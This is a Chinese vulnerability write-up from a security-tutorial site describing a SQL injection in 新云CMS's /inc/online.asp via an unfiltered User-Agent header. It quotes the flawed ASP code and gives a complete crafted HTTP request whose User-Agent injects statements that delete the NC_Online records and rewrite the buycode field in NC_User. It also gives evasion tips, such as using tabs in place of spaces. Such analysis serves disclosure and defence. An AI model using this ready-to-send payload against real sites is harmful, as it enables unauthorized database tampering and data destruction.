手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >新云CMS Online.asp页面过滤不严导致SQL注入漏洞
新云CMS Online.asp页面过滤不严导致SQL注入漏洞
摘要:受影响系统:最新版本漏洞文件:/inc/online.asp代码分析如下:OnlineSQL="INSERTINTONC_Online(id...

受影响系统:

最新版本

漏洞文件:

/inc/online.asp

代码分析如下:

OnlineSQL = "INSERT INTO NC_Online(id,ChannelID,username,identitys,station,ip,browser,startTime,lastTime,userid,strReferer) VALUES (" & UserSessionID & "," & cid & ",'" & strUsername & "','" & stridentitys & "','" & CurrentStation & "','" & remoteaddr & "','" & BrowserType.platform&"|"&BrowserType.Browser&BrowserType.version & "|"&BrowserType.AlexaToolbar&"'," & NowString & "," & NowString & "," & userid & ",'" & strReferer & "')" //第69行

。。。。。。

Agent = Request.ServerVariables("HTTP_USER_AGENT") //第99行

。。。。。。

ElseIf Left(Agent, 5) = "Opera" Then '有此标识为浏览器 //第162行

Agent = Split(Agent, "/")

Browser = "Mozilla "

Tmpstr = Split(Agent(1), " ")

version = Tmpstr(0)

HTTP_USER_AGENT我们可以控制,则version变量我们就可以控制了。

构造数据包如下:

POST /inc/online.asp HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Referer: http://localhost/xx.htm

Accept-Language: zh-cn

UA-CPU: x86

Accept-Encoding: gzip, deflate

User-Agent: Opera/haha',2008,2009,11111,'');delete from NC_Online;update[NC_User]set[buycode]=7;--

Host: localhost

Connection: Keep-Alive

Cookie: ASPSESSIONIDAABBCRRS=FFGNDBDDKJLFADOGOMKLBGPF

成功执行sql语句

注意的地方:

1. 在两次分割成数组的时候是以"/"和" ",所以构造的sql语句时使用的间隔符就不能用/**/和空格,上面是使用tab键弄出来的空格。

2. 一定要加上delete from NC_Online,不然下次程序就不执行insert语句,而改成执行update语句了。

【新云CMS Online.asp页面过滤不严导致SQL注入漏洞】相关文章:

遨游已经修复的三个安全漏洞分析

恒浪IMS整合系统V4.1 多文件存在SQL注入漏洞

Microsoft Internet Explorer FTP含命令注入漏洞

Belkin Wireless G Router绕过限制 拒绝服务漏洞

多多淘宝客V7.4绕过防注入及一个注入漏洞的分析

PJBlog个人博客系统cls_logAction.asp文件存在注入漏洞

PHPCMS2007 SP6 vote模块SQL注射漏洞的分析

NetWin SMSGate Content-Length远程拒绝服务漏洞

FreeBSD inet_network() 函数中的单字节溢出漏洞

Kindeditor特定情况可能会导致全盘浏览的漏洞

精品推荐
分类导航